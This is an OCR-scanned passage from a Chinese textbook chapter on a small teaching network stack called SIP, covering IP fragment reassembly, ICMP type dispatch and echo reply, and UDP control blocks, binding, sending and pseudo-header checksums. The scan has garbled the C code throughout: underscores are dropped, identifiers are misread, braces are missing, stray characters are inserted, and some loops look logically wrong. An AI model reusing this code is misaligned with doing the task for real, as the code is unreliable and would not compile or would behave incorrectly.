skb->next = skb cur; /* 将 接收 到 的 数据 放 到 此 位 置 */ 
Skb prev->next = skb; 
if(offset + len > FRAG OFFSET(skb_ cur->nh.iph)) 

/* 当 前 数据 与 后 面 的 分 片 数据 覆盖 */ 


{ 人 # 计 算 当前 链 的 数据 长 度 修改 值 */ 
_ ul6 modify = FRAG OFFSET(skb_cur->nh.iph) - offset + 
IPHDR LEN; 
skb->nh.iph->tot len = htons (modify); 
/* 更 新 当前 链 长 度 */ 


上 
if (FRAG OFFSET(skb prev->nh.iph) 
/* 前 面 的 分 片 长 度 覆 盖 当 前 数据 */ 
+ FRRAG_LENGTH (skb_Prev->nh.iph) 
> FRAG OFFSET(skb cur->nh.iph)) 

由 /* 计 算 前 面 数 据 长 度 的 更 改 之 */ 

_ ul6 modify = FRAG OFFSET(skb prev->nh.iph) - offset 

+ IPHDR LEN; 


Bi 
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Skb prev->nh.iph->tot len = htons (modify) 
/* 修 改 前 一 片 的 数据 长 度 */ 
bi 
found = 1; /* 找 到 合适 的 分 片 插 入 位 置 */ 


} 
else /* 为 重组 链 上 的 头 部 */ 
{ 

if(offset < FRAG OFFSET(skb_cur->nh.iph) ){ 

/* 当 前 链 的 偏 移 量 小 于 第 一 个 分 片 的 偏 移 长 度 */ 
skb->next = ipr->skb; /* 挂 接 到 重组 链 的 头 部 */ 
ipr->skb = skb; 
if(offset + len + IPHDR LEN /* 查 看 是 否 获 盖 后 面 分 片 的 数据 */ 

> FRAG OFFSET(skb_cur->nh.iph)) 


{ /+* 修 改 分 片 的 数据 长 度 */ 

ul6 modify = FRAG OFFSET(skb cur->nh.iph) - offset + 
IPHDR LEN; 
if(!offset) /* 偏 离 量 为 0*/ 


modify -= IPHDR_ LEN; 
/* 包 含 头 部 , 所 以 数据 段 长 度 需 要 减 去 IP 头 部 长 度 */ 
skb->nh.iph->tot_len = htons (modify); 
/* 设 置 分 片 中 修改 后 的 长 度 */ 


. 


length += skb _cur->nh.iph->tot_ len - IPHDR LEN; 
/* 当 前 链表 中 的 数据 长 度 #/ 


/* 重 新 计算 重组 链 上 的 总 数据 长 度 */ 


} 


for (skb_cur=ipr->skb,length = 0; 
skb_cur != NULL; 
Skb cur = skb cur->next) 


length += skb cur->nh.iph->tot len - IPHDR LEN; 


} 
length += IPHDR LEN; 


/* 全 部 的 IP 分 片 都 已 经 接收 到 后 进行 数据 报 文 的 重新 组 合 

数据 复制 到 一 个 新 的 数据 结构 中 , 原来 的 数据 接收 都 释放 掉 

并 从 分 组 链 中 取出 , 将 重组 后 的 数据 结构 指针 返回 */ 

if (length == ipr->datagram len ) /* 分 组 全 部 接收 到 */ 

{ 
ipr->datagram len += IPHDR LEN; /* 计 算数 据 报 文 的 实际 长 度 长 度 */ 
skb = skb alloc (ipr->datagram len + ETH HLEN); /* 申 请 空间 */ 


Skb->phy.raw = skb put (skb, ETH HLEN); /* 物 理 层 #/ 
skb->nh.raw = skb put (skb, IPHDR LEN); /* 网 络 层 #/ 
memcpy (skb->nh.raw, & ipr->iphdr, sizeof (ipr->iphdr)); 

/* 向 新 数据 结构 中 复制 TP 头 */ 


skb->nh.iph->tot len = htons (ipr->datagram len); 
/* 新 结构 中 的 tot_len*/ 


for (skb prev=skb cur=ipr->skb;skb cur != NULL;) 
/* 遍 历 重组 数据 链 */ 
{ 


int size = skb cur->end ~- skb cur->tail; 


» 
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/* 计 算 复 制 数据 源 的 长 度 */ 
pos = skb put(skb，size) ; /* 计 算 复制 目的 地 址 位 置 */ 
memcpy (pos, /* 将 一 个 分 片 复 制 到 新 结构 中 */ 


Skb _ cur->tail, 
Skb cur->nh.iph->tot len - skb cur->nh.iph->ihl<<2); 


二 
/* 一 次 从 重组 链 中 摘除 数据 并 释放 , 然后 设置 新 结构 中 的 几 个 IP 头 部 参数 */ 
ipr prev->next = ipr->next; /* 将 此 数据 报 文 从 重组 链 中 摘除 */ 
IP_FREE REASS (ipr); /# 释 放 此 报 文 的 重组 连 */ 
skb->nh.iph->check = 0; /* 设 置 校 验 值 为 0*/ 
skb->nh.iph->frag off = 0; /* 偏 移 值 为 0*/ 
Skb->nh.iph->check = SIP Chksum(skb->nh.raw, skb->nh.iph->tot_ 
len); /* 计 算 IP 头 部 校 验 和 */ 
} 
normal: 
return skb; 
freeskb: 


Skb_free(skb); 
return NULL; 
} 


IP_FREE_REASS 宏 函 数 用 于 释放 重组 队列 ， 宏 遍历 重组 队列 的 链 ， 对 链 中 的 skbuff 
结构 进行 释放 。 由 于 重组 链 是 按照 next 指针 进行 连接 的 , 所 以 可 以 使 用 next 指针 进行 遍历 
的 操作 ， 链 结束 的 标志 是 next 为 NULL。 使 用 dofjwhile(0); 的 方式 进行 仅仅 调用 一 次 的 代 
码 段 进行 定义 是 在 Linux 中 经 常 采用 的 方法 , 这 个 方法 的 好 处 是 可 以 构建 一 个 局 部 的 空间 ， 
与 外 部 的 程序 不 发 生 名 称 空间 的 污染 。 


#define IP FREE REASS (ipr) 
do{ 
struct skbuff *skb=NULL,*skb prev=NULL; 
for(skb prev = skb = ipr->skb; 
skb != NULL; 
Skb prev = skb, 
Skb = skb->next, 
Skb free(skb prev)); 
free (ipr); 
}while (0); 


er ee 


19.7 SIP 网 络 协议 栈 的 ICMP 层 


SIP 网 络 协 议 栈 的 ICMP 模块 的 作用 对 网 络 控制 信息 进行 处 理 , 包括 输入 数据 的 处 理 、 
各 种 处 理 协议 的 实现 函数 挂 接 。 由 于 ICMP 模块 的 协议 比较 多 ， 本 模块 实现 了 对 回 显 请 求 
的 应 答 函 数 。 本 框架 中 可 以 挂 接 各 种 不 同 的 实现 函数 。 


19.7.1 SIP 控制 报 文 协议 的 数据 结构 


ICMP 协议 头 部 的 数据 结构 的 代码 如 下 ， 主 要 包含 协议 类 型 、 协 议 代 码 和 数据 校 验 和 
等 头 部 数据 。 在 数据 的 内 容 部 分 ， 包含 多 种 协议 的 支持 ， 如 支持 回 显 协议 的 支持 echo、 网 
络 卫 地 址 手 码 的 gateway、 对 MTU 的 支持 的 frag。 


“a 
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struct sip icmphdr 


_u8 type; 
_u8 code; 
_ul6 checksum; 
union 
tt 
struct 
{ 
U0 gr 
_ul6 sequence; 
} echo; 
1u32 gateway; 
struct 
_ul6 _ unused; 
_ul6 mtu; 
} frag; 
} un; 


}; 


19.7.2 SIP 控制 报 文 协议 的 协议 支持 


SIP 网 络 协议 栈 的 ICMP 实现 方式 用 一 个 数据 结构 来 实现 所 有 协议 类 型 的 挂 接 ， 数 据 
结构 的 代码 实现 如 下 所 示 。 其 中 的 handler 参数 是 一 个 函数 指针 , 不 同 协议 类 型 的 实现 可 以 


都 按照 这 种 函数 的 形式 实现 。 


struct icmp control 


{ 


void (*handler) (struct net device *dev, struct skbuff *skb); 


short error; 


}; 


在 ICMP 模块 中 可 以 挂 接 多 个 ICMP 类 型 的 今 
显 应 答 、 时 间 超 时 、 时 间 截 请 求 、 时 间 戳 应 答 、 信 和 
码 应 答 等 多 种 协议 类 型 。SIP 网 络 协议 栈 中 全 局 变量 iemp_pointers0 用 于 保存 所 有 协议 类 型 


实现 ， 实 现 的 代码 如 下 : 


static const struct icmp control icmp pointers[NR ICMP TYPES + 1] 


ICMP ECHOREPLY] = { 
.handler = icmp discard, 


}, 

本 二 | 
.handler = icmp discard, 
.error = 1, }, 

2 .= 


-handler = icmp discard, 
.error = 1, }, 

ICMP DEST UNREACH] = { 
-handler = icmp unreach, 
“error = Ty jy 

ICMP SOURCE QUENCH] = { 


"600。 


/*ICMP 协议 类 型 */ 
/*ICMP 类 型 代码 */ 
/*ICMP 的 数据 校 验 和 */ 
/* 数 据 部 分 */ 


/*ID 标识 */ 

/* 数 据 的 序列 号 */ 
/* 回 显 数据 */ 
/* 网 关 *#/ 


/*MTU*/ 
/# 分 后 */ 


/* 处 理 函数 */ 
/* 错 误 方式 */ 


/* 回 显 应 答 */ 
/+ 丢弃 */ 


/* 主 机 不 可 达 */ 


/* 源 队列 */ 


: 现 ， 可 以 挂 接 主 机 不 可 达 、 重 定向 、 回 
青 求 、 信 息 应 答 、IP 掩 码 请 求 、IP 掩 
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-handler = icmp unreach, 
ht 

ICMP REDIRECT] = { /* 重 定向 */ 
.handler = icmp redirect, 
.error = 1, 1}, 

ol = 
.handler = icmp discard, 
“OroE ww Lh 

Tl 
-handler = icmp discard, 
error ss Tr }s 


ICMP ECHO] = { /* 回 显 应 答 */ 
-handler = icmp_echo, Ke 
Sm 


.handler = icmp discard, 
.error = 1,}, 
10] = { 
-handler = icmp discard, 
.error = 1,}, 
ICMP TIME EXCEEDED] = { /* 时 间 超 时 */ 
.handler = icmp_unreach, 
.error = 1, 1}, 
ICMP PARAMETERPROB] = { /* 参 数 有 误 */ 
.handler = icmp_unreach, 
.error = 1, }, 


ICMP TIMESTAMP] = { /* 时 间 戳 请 求 */ 
.handler = icmp timestamp, }, 

ICMP TIMESTAMPREPLY] = { /* 时 间 戳 应 答 */ 
.handler = icmp discard, }， 

ICMP INFO REQUEST] = { /* 信 息 请 求 */ 
-handler = icmp discard, Fr 

ICMP INFO REPLY] = { /* 信 息 应 答 */ 
-handler = icmp discard, }， 

ICMP ADDRESS] = { /*IP 地 址 掩 码 请 求 */ 
.handler = icmp address, }, 

ICMP ADDRESSREPLY] = { /*IP 地 址 掩 码 应 答 */ 


.handler = icmp address reply, }, 
}; 


19.7.3 ”SIP 控制 报 文 协议 的 输入 函数 
SIP 网 络 协议 栈 的 ICMP 协议 输入 函数 为 icmp_input0)， 此 函数 的 实现 包含 如 下 的 处 理 


步 又 : 
(1) 查看 是 否 进行 了 IP 头 部 校 验 和 的 计算 。 如 果 校 验 和 计算 错误 ， 则 释放 资源 ， 退 出 
(2) 根据 ICMP 的 协议 类 型 ， 调 用 不 同 协议 的 处 理 过 程 。 
输入 处 理 函数 的 实现 函数 代码 如 下 : 
int icmp input(struct net device *#dev, struct skbuff *skb) 


DBGPRINT (DBG LEVEL TRACE,"==>icmp input\n"); 
struct sip icmphdr *#icmph; 


switch (skb->ip_ summed) /* 查 看 是 否 已 经 进行 了 校 验 和 计算 */ 
{ 
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case CHECKSUM NONE : /* 没 有 计算 校 验 和 */ 
skb->csum = 0; 
if (SIP Chksum(skb->phy.raw, 0)) 


/* 计 算 IP 层 的 校 验 和 */ 
{ 
DBGPRINT (DBG LEVEL ERROR, "icmp checksum error\n"); 
goto drop; 
} 
break; 
default: 
break; 
} 
icmph = skb->th.icmph; /*ICMP 头 指针 */ 
if (icmph->type > NR_ICMP_TYPES)  ”/* 类 型 不 对 */ 
goto drop; 


icmp pointers[icmph->type] .handler (dev, skb); 
/* 查 找 icmp_pointers 中 合适 类 型 的 处 理 函数 */ 


normal: 
DBGPRINT (DBG_LEVEL TRACE, "<==icmp_input\n"); 
return 0; 

drop: 
skb_ free (skb); /* 释 放 资 源 */ 


goto normal; 


19.7.4 SIP 控制 报 文 协议 的 回 显 应 答 函 数 


ICMP 协议 中 回 显 应 答 函 数 是 在 原 有 回 显 请 求 的 基础 上 实现 的 , 其 实现 代码 如 下 所 示 。 

先 判断 回 显 请 求 数据 是 否 合法 ， 如 果 合 法 就 构造 回 显 应 答 的 数据 。 回 显 应 答 数据 的 构 
建 ， 仅 仅 修 改 原 有 的 回 显 数据 协议 类 型 ， 将 原来 为 ICMP_ECHO(8) 的 ICMP 协议 类 型 修改 
为 ICMP_ECHOREPLY(0)， 这 样 仅仅 修改 了 某 一 位 的 值 。 

ICMP 的 校 验 和 也 不 用 重新 计算 ， 仅 仅 需要 在 原来 的 基础 上 稍微 进行 修改 即 可 : 当 修 
改 协 议 类 型 可 以 造成 进位 操作 时 和 不 进行 进位 操作 时 的 值 相差 为 1。 由 于 校 验 和 是 在 16 位 
值 的 上 8 位 进行 的 ， 所 以 要 进行 对 1 左 移 8 位 的 操作 。 


static void icmp_ echol(struct net device *dev, struct skbuff *skb) 
{ 


DBGPRINT (DBG LEVEL TRACE,"==>icmp echo\n"); 
struct sip icmphdr *+icmph = skb->th.icmph; 
struct sip iphdr *iph = skb->nh.iph; 
DBGPRINT (DBG_LEVEL NOTES, "tot len:%d\n",skb->tot len); 
if (IP_IS_BROADCAST (dev，skb->nh.iph->daddr) /* 判 断 目的 IP 地址 是 否 广播 */ 
11 IP_IS MULTICAST (skb->nh.iph->daddr)) /+ 判断 目的 IP 地 址 是 否 多 播 */ 
{ 
goto EXITicmp echo; 
} 
icmph->type = ICMP ECHOREPLY; /* 设 置 类 型 为 回 显 应 人 
if(icmph->checksum >= htons (0xFFFF- (ICMP ECHO << 8))) 
/如果 因为 修改 协议 类型 造成 进位 v/ 
icmph->checksum += htons (ICMP ECHO<<8 )+1; 
/* 修 正 校 验 和 */ 
}else { 
icmph->checksum += htons (ICMP ECHO<<8); 
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/* 增 加 校 验 和 */ 

} 

be32 dest = skb->nh.iph->saddr; 

ip_output (dev, skb, &dev->ip host.s addr,&dest, 255, 0, IPPROTO ICMP); 
/# 发 送 应答 */ 

EXITicmp_echo: 
DBGPRINT (DBG LEVEL TRACE,"<==icmp echo\n"); 


return ; 


} 
19.8 SIP 网 络 协议 栈 的 UDP 层 


SIP 网 络 协议 栈 的 UDP 协议 层 比较 简单 ，UDP 层 的 作用 是 对 底层 网 络 数据 进入 UDP 
层 后 进行 相应 的 处 理 , 或 者 将 数据 临时 缓存 等 待 用 户 的 读 取 ; 对 上 层 模块 的 数据 发 送 , UDP 
层 在 构造 UDP 头 部 后 ， 将 数据 交 由 IP 层 进行 处 理 ， 并 同时 对 UDP 的 状态 进行 维护 。 


19.8.1 SIP 数据 报 文 层 的 数据 结构 
UDP 的 头 部 数据 结构 如 图 19.23 所 示 ， 其 结构 定义 的 实现 代码 如 下 : 


1516 31 
| 源 端 口号 (16 位 ) | 目的 端口 号 (16 位 ) 区 a 
| UDP 数据 长 度 (46 位) | UDP 校 验 和 (16 位 ) | 
数据 | 


图 19.23 UDP 的 头 部 数据 结构 示意 图 


struct sip_udphdr 
{ 


be16 source; /* 源 端口 */ 

_ be1l6 dest; /* 目 的 端口 */ 
_ul6 len; /* 数 据 长 度 */ 
_ bel6 check; /*UDP 校 验 和 */ 


}; 


19.8.2 SIP 数据 报 文 层 的 控制 单元 
UDP 层 的 控制 单元 是 整个 UDP 层 的 核心 ，UDP 层 的 操作 主要 围绕 控制 单元 进行 。 
1. 控制 单元 结构 的 代码 


控制 单元 中 的 结构 定义 代码 如 下 所 示 。 如 图 19.24 所 示 ， 控 制 单元 中 的 成 员 变 量 主要 
包含 如 下 几 类 。 

口 IP 地 址 和 端口 值 : 包括 本 地 和 远程 主机 的 耳 地 址 和 端口 值 。 

口 控制 参数 : 包括 服务 类 型 ， 生 存 时 间 。 
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口 控制 单元 指针 : 包含 前 向 和 后 向 指针 。 


struct udp pcb 

{ 
struct in addr 
_ul6 
struct in addr 
_ul6 
—u8 
_u8 
struct sock 
struct udp pcb 
struct udp pcb 
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ip_local; 
port local; 

ip_remote; 
Port remote; 
tos; 
ttl ; 

*SOCK; 
*next; 
*#*prev; 


struct udp pcb 


/* 本 地 IP 地 址 */ 

/* 本 地 端口 地 址 */ 

/* 发 送 目 的 IP 地 址 */ 

/* 发 送 目 的 端口 地 址 */ 
/* 服 务 类 型 */ 

/* 生 存 时 间 */ 

/* 网 络 无 关 结 构 */ 

/* 下 一 个 UDP 控制 单元 */ 
/* 前 一 个 UDP 控制 单元 */ 


port local; 


本 地 IP 地 址 
. / | 本 地 端口 地 址 
struct in addr ip local ; / 发 送 目的 耳 地 址 
_ul6 [4 | 发 送 目的 端口 地 址 


struct in addr ip remote; 


WE 
(fem 


下 一 个 UDP 控 制 单元 


前 一 个 UDP 控 制 单元 


-ul6 port remote; 

—u8 tos; / 状态 标记 

_u8 ttl; 1 网 络 无 关 结构 
_u8 flags; 

struct _sock *SOCKk; /4 

struct _udp pcb *next ; A 

struct udp pcb *previ 


图 19.24 UDP 控制 单元 的 数据 结构 示意 图 


UDP 控制 单元 struct udp_pcb 用 于 对 UDP 套 接 字 进行 控制 , 识别 同一 个 主机 上 的 多 个 
UDP 是 靠 本 机 的 端口 值 来 区 分 的 ， 因 此 可 以 说 UDP 控制 单元 与 本 机 的 端口 值 之 间 是 一 一 
对 应 的 关系 。 为 了 快速 地 进行 操作 ，SIP 网 络 协议 栈 构建 了 一 个 简单 的 hash 表 进 行 端口 值 
到 控制 单元 之 间 快 速 查 找 的 实现 ， 如 图 19.25 所 示 。 通 过 对 UDP 端口 的 hash 可 以 快速 地 
定位 某 个 端口 的 对 应 控制 单元 。 此 hash 表 冲 突 解决 是 采用 了 简单 的 线性 链表 结构 , 没有 进 


行 更 优化 的 处 理 。 


UDP 端口 和 控制 单元 的 hash() 函 数 采 用 了 简单 的 取 余 算法 , 即 对 于 一 个 hash 表 大 小 为 
N， 一 个 UDP 端口 的 控制 单元 位 于 port%N 的 位 置 上 。 在 SIP 中 建立 了 一 个 大 小 为 128 的 
struct udp_pcb 结构 数组 ， 因 此 ， 可 以 最 多 有 128 个 UDP 控制 单元 同时 存在 而 不 发 生 冲 突 。 


2. 端口 分 配方 法 


UDP 层 端 口 的 分 配方 法 如 下 面 的 代码 所 示 。 维 护 一 个 递增 的 index 端口 值 ， 其 初始 值 为 


1024, 不 采用 此 为 系统 保留 端口 。 当 请 求 到 来 的 时 候 , 端口 值 递 增 1， 然 后 将 值 传递 给 月 


日 户 。 


其 中 的 index 采用 32 位 数值 ， 而 端口 值 为 16 位 数 ， 所 以 发 送 给 用 户 的 数据 取 了 低 16 位 。 
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UDP 端口 hash 


struct udp_pcb struct udp_pcb struct udp_pcb 
struct -in addr ip_local; struct in_addr ip_local; struct _in addr ip_local; 
ul6 port -local; 


_u16 port_local; 


struct in _addr ip_remote; 
_-ul6 port_remote; 
u8 


struct in_addr ip remot; 
ul6 Pport_remote; 


| 
_ul6 port_local; | 
| 


—u8 
Struct sock *SOCK; 
struct udp_pcb *next; 
struct udp_pcb 


flags; 
struct sock *SOCk; 
struct udp_pcb *next; 


图 19.25 UDP 控制 单元 的 hash 链表 结构 


#define UDP HTABLE SIZE 128 /*UDP 控制 单元 的 大 小 */ 
static struct udp pcb *udp pcbs[UDP HTABLE SIZE]; 
/*UDP 控制 单元 数组 */ 


static _ul6 found a port() 

{ 
static _u32 index = 1024; /* 静 态 变量 , 用 于 保存 当前 已 经 分 配 的 端口 */ 
index ++; /* 增 加 端口 值 */ 
return ( ul16) (index&0xFFFF); /* 返 回 16 位 的 端口 值 */ 


19.8.3 SIP 数据 报 文 层 的 输入 函数 


UDP 层 的 输入 数据 处 理 函 数 为 SIP_UDPInput()， 对 应 于 应 用 层 UDP 的 数据 处 理 函 数 
将 底层 接收 到 的 网 络 数据 进行 解析 后 , 放 到 合适 的 控制 单元 上 , 等 待 用 户 的 接收 数据 动作 。 
函数 的 代码 实现 如 下 ， 包 含 如 下 几 个 步骤 : 

(1) 获取 网 络 数据 的 UDP 头 部 中 的 目的 端口 号 ， 对 本 机 来 说 就 是 分 配 的 本 地 UDP 端 
口号 ， 这 是 用 于 识别 PCB 的 主要 键 值 。 

(2) 根据 这 个 端口 号 ， 获 得 UDP 控制 单元 数组 的 头 部 指针 ， 对 以 这 个 指针 为 头 指针 
的 链表 进行 遍历 ， 查 找 端口 号 与 输入 网 络 数据 端口 号 相 匹配 的 单元 。 

(3) UDP 控制 单元 中 的 结构 struct sock 是 协议 无 关 层 的 数据 结构 ， 接 收 缓冲 区 的 链表 
结构 就 在 这 个 结构 中 。 通 过 这 个 结构 将 接收 到 的 UDP 网 络 数据 结构 挂 接 到 节 后 缓冲 区 链表 
上 ， 并 增加 接收 缓冲 区 的 计数 值 ， 等 待 用 户 从 接收 缓冲 区 上 将 数据 接收 出 去 。 


int SIP UDPInput (struct net device *#dev, struct skbuff *skb) 
{ 


ul6 port = ntohs (skb->th.udph->dest); 


struct udp pcb *upcb = NULL; 
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/* 根 据 端口 地 址 查找 控制 链表 结构 中 的 控制 单元 */ 
for (upcb = udp pcbs[port%UDP HTABLE SIZE]; upcb != NULL; upcb = 
upcb->next) 


if (upcb->port local== port) /* 找 到 */ 
break; 

} 
if(!upcb) 

return 0; 
struct sock *sock = upcb->sock; /* 协 议 无 关 层 的 结构 */ 
if(!sock) 

return 1; 
struct skbuff *#recvl = sock->skb recv; /* 接 收 缓冲 区 链表 头 指针 */ 
if(!recvI1) /* 为 空 */ 

sock->skb recV = skb; /* 挂 接 到 头 部 */ 


Skb->next = NULL; 
else 
{ 
for(; recvl->next != NULL; upcb = upcb->next)  /* 到 尾部 */ 


A 


recvl->next = skb; /* 在 尾部 挂 接 */ 
skb->next = NULL; 

上 

sem post(&sock->sem recv); /* 接 收 缓冲 区 计数 值 增加 */ 


19.8.4 ”SIP 数据 报 文 层 的 输出 函数 
输出 函数 的 代码 实现 如 下 : 


int SIP UDPSendOutput(struct net device *dev, struct skbuff *skb,struct 
udp_pcb *pcb, 


{ 
l 


struct in addr *src, struct in addr *dest) 


ip_output (dev, skb, src, dest, pcb->ttl, pcb->tos, IPPROTO UDP); 


19.8.5 ”SIP 数据 报 文 层 的 建立 函数 


eerie opp te -个 struct udp_pcb 变量 ， 并 初始 化 结构 为 0， 设置 生 
存 时 间 的 初始 地 址 为 255， 将 结构 指针 返回 


struct udp pcb *SIP_UDPNew(void) 


a 
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struct udp pcb *pcb = NULL; /*pcb 变量 */ 
pcb = (struct udp pcb *)malloc(sizeof (struct udp_pcb) ) ; /* 申 请 变量 */ 
if (pcb != NULL) /* 申 请 成 功 */ 


人‘ 
memset (pcb, 0, sizeof(struct udp pcb)); /* 初 始 化 为 0*/ 
pcb->ttl = 255; /* 设 置 生存 空间 为 255*/ 
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return pcb; /* 返 回 pcb 指针 */ 
} 


19.8.6 SIP 数据 报 文 层 的 释放 函数 


SIP_UDPRemove() 函 数 将 一 个 pcb 结构 从 控制 链表 中 摘除 并 释放 此 结构 所 占用 的 资 
源 ， 其 代码 实现 如 下 所 示 。 首 先 判 断 输 入 参数 pcb 是 否 合法 ， 然 后 根据 pcb 中 端口 查找 控 
制 链表 中 对 应 位 置 的 pcb， 如 果 找 到 此 结构 则 从 链表 中 将 指针 摘除 ， 最 后 释放 pcb 所 占用 
的 内 存 。 
void SIP UDPRemove (struct udp pcb *pcb) 
: struct udp pcb *#pcb t; 
nt = 0 
if(!pcb){ /*pcb 为 室 */ 
return; 


1 
Pcb t = udp_pcbs[pcb->port local%UDP HTABLE SIZE]; 
/* 返 回 端口 值 的 hash 表 位 置 控制 结构 */ 


if(!pcb t){ /* 为 空 */ 
}else if(Pcb t == pcb) { /*# 为 当前 控制 结构 */ 
udp pcbs[pcb->port local%®%UDP HTABLE SIZE] = pcb t->next; 
/* 从 控制 链表 中 摘除 结构 */ 
}elset /* 头 部 不 是 控制 结构 */ 
for (; pcb t->next != NULL; Pcb t = Pcb t->next) 
/* 查 找 匹 配 项 * / 
{ 
if (pcb t->next == pcb) /* 找 到 */ 


{ 
pcb_t->next = pcb->next; /* 从 控制 链表 中 摘除 结构 */ 
1 


1 


free (pcb); /* 释 放 资 源 */ 
h 


19.8.7 ”SIP 数据 报 文 层 的 绑 定 函数 


UDP 层 绑 定 的 作用 是 设置 控制 单元 的 IP 地 址 和 端口 号 。 从 下 面 的 实现 代码 中 可 以 看 
出 ，SIP_UDPBind() 函 数 先 查 找 控制 单元 数组 中 的 控制 单元 ， 看 是 否 已 经 存在 这 个 控制 
结构 。 

然后 将 本 地 地 址 的 IP 地 址 设置 为 输入 的 IP 地 址 值 ， 如 果 绑 定 的 端口 为 0， 表 明 需 要 
系统 来 分 配 一 个 端口 ， 这 是 调用 found_a_port() 函 数 来 生成 一 个 端口 ， 在 PCB 链表 中 查看 
这 个 端口 没有 在 使 用 之 后 ， 将 这 个 端口 值 设置 为 当前 PCB 结构 的 端口 值 。 如 果 在 PCB 链 
表 中 没有 此 PCV 单元 ， 则 将 此 PCB 单元 放 到 数组 hash 位 置 的 头 部 。 

int SIP UDPBind(struct udp pcb *pcb， 


struct in addr *ipaddr, 
_ul6 port) 
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struct udp pcb *#ipcb; 
_u8 rebind; 
rebind = 0; 
/* 查找 udp_pcbs 中 是 否 已 经 存在 这 个 控制 单元 */ 
for (ipcb = udp_pcbs [Port&(UDP_HTRABLE SIZE-1)]; ipcb != NULL; ipcb = 
ipcb->next) 
{ 
if (pcb == ipcb) /* 已 经 存在 */ 
{ 
rebind = 1; /* 已 经 绑 定 */ 
} 
pcb->ip local.s addr= ipaddr->s addr; 
if (port == 0) /* 还 没有 指定 端口 地 址 */ 
{ 
#define UDP PORT RANGE START 4096 
#define UDP PORT RANGE END 0x7fff 
port = found a port(); /* 生 成 端口 */ 
ipcb = udp pcbs[port]; 
/* 人 遍历 控制 链表 中 的 单元 查看 是 否 已 经 使 用 这 个 端口 地 址 */ 
while ((ipcb!=NULL)&& (port != UDP_PORT RANGE END) ) 
{ 


if (ipcb->port local == port) /* 已 经 使 用 此 端口 */ 
port = found a port(); /* 重 新 生成 端口 地 址 */ 
ipcb = udp_ pcbs[port]; /* 重 新 扫描 */ 
}elsef 
ipcb = ipcb->next; /* 下 一 个 */ 
} 
if (ipcb != NULL) /* 没 有 合适 的 端口 */ 
{ 
return -1; /* 返 回 错误 值 */ 
} 
} 
pcb->port local = port; /* 绑 定 合适 的 端口 值 */ 
if (zebind == 0) /* 还 没有 将 此 控制 单元 加 入 链表 */ 
{ 
pcb->next = udp_pcbs[port]; /* 放 到 控制 单元 链表 的 hash 位 置 头 部 */ 
udp_pcbs [port] = pcb; /* 更 新 头 指针 */ 
} 
return 0; 


19.8.8 SIP 数据 报 文 层 的 发 送 数据 函数 


SIP 协议 栈 发 送 网 络 数据 的 函数 为 SIP_ UDPSendTo0， 函 数 的 作用 是 将 输入 参数 skb 
中 的 网 络 数据 发 送 到 IP 地址 为 dst ip 的 目的 主机 的 dst_port 端口 ,其 中 的 控制 单元 为 PCB 。 
这 个 函数 的 实现 代码 如 下 , 先 查 看 是 否 这 个 PCB 已 进行 了 端口 绑 定 ， 如果 没有 则 先进 行 端 
口 绑 定 ; 然后 设置 UDP 的 头 部 ， 主 要 包含 源 端 口 、 目 的 端口 ; 先 将 校 验 和 设置 为 0， 然 后 
进行 UDP 的 校 验 ， 注 意 ，UDP 的 校 验 和 计算 方式 和 一 般 的 校 验 和 计算 方式 不 同 ， 它 包含 
了 IP 头 部 的 一 部 分 内 容 。 
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int SIP_UDPSendTo (struct net device *dev, 
struct udp pcb *pcb, 
struct skbuff *#skb, 
struct in addr *dst ip, _ ul6 dst port) 


struct sip udphdr *udphdr; 
struct in addr *#src _ ip; 


int err; 
/* 如 果 此 PCB 还 没有 绑 定 端口 , 进行 端口 绑 定 */ 
if (pcb->port local == 0) /* 还 没有 绑 定 端口 */ 
{ 

err = SIP UDPBind (pcb, &pcb->ip local, pcb->port local); 

/# 绑 定 端口 +/ 
if (err != 0) 
{ 
return err; 

} 
udphdr = skb->th.udph; /*UDP 头 部 指针 */ 
udphdr->source = htons (Pcb->port_local) ;/*UDP 源 端口 */ 
udphdr->dest = htons(dst port); /*UDP 目的 端口 */ 
udphdr->check= 0x0000; /* 先 将 UDP 的 校 验 和 设置 为 0*/ 
/* PCB 本 地 地 址 为 IP_ANY_ADDR? */ 
if (pcb->ip local.s addr == 0) 
{ 

src_ip = &dev->ip host; /* 将 源 地 址 设置 为 本 机 IP 地 址 */ 
} else E 

src ip = &(pcb->ip local); /* 用 PCB 中 的 IP 地 址 作为 源 IP 地 址 */ 
} 
udphdr->len = htons (skb->len); /*UDP 的 头 部 长 度 */ 
/* 计算 校 验 和 */ 
if ((pcb->flags & UDP FLAGS NOCHKSUM) == 0) 


Ww 


udphdr->check= SIP ChksumPseudo(skb, src ip, dst ip, IPPROTO UDP, 


skb->len); 
if (udphdr->check == 0x0000) 
udphdr->check = Oxffff; 


} 
/* 调 用 UDP 的 发 送 函数 将 数据 发 送出 去 */ 


err = SIP UDPSendoutput (skb， src_ ip, dst ip, pcb->ttl, pcb->tos, 


IPPROTO UDP); 
return err; 


19.8.9 SIP 数据 报 文 层 的 校 验 和 计算 


UDP 校 验 和 的 计算 方式 与 人 P 头 部 的 校 验 和 计算 的 方式 不 同 ， 如 图 19.26 所 示 。UDP 


校 验 和 的 计算 区 域 除了 原 有 的 UDP 区 域外 ， 还 需要 他 头 部 的 一 些 数据 ， 包 含 源 卫 


地 址 、 


目的 耳 地 址 及 协议 类 型 ， 在 UDP 的 校 验 和 计算 中 ，UDP 的 数据 长 度 进行 了 两 次 计算 。 
SIP 中 的 UDP 校 验 和 计算 为 SP_ChksumPseudo0) 函 数 ， 输 入 的 参数 包含 UDP 原始 网 
络 数据 ， 源 PP 地址、 目的 IP 地 址 和 协议 及 协议 长 度 也 包含 在 内 。 具 体 的 计算 方法 与 其 他 


校 验 和 计算 方式 一 致 ， 实 现代 码 如 下 : 
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0 1516 31 
源 耳 地 址 G2 位 ) 
目的 Bb 址 G2 们 ) UDP 伪 头 部 
空 (8 位 ) | ”协议 类 型 (8 位 ) 总 长 度 (16 位 ) 
源 端 口号 (16 位 ) 下 的 顺口 瑟 016 位 ) ey 
UDP 数据 长 度 (16 位 ) 校 验 和 46 位 ) 由 验 区 域 
数据 


图 19.26 ”UDP 的 校 验 和 计算 


ul6 
SIP ChksumPseudo (struct skbuff *skb, 
struct in addr *src, struct in addr *dest, 
u8 proto, ul6 proto len) 


u32 acc; 
u8 swapped; 
acc = 0; 


swapped = 0; 
{ 
acc += SIP Chksum(skb->data, skb->end - skb->data); 
while ((acc >> 16) != 0) 
. 
acc = (acc & OxffffUL) + (acc >> 16); 
} 
if (skb->len % 2 != 0) 
{ 
swapped = 1 - swapped; 
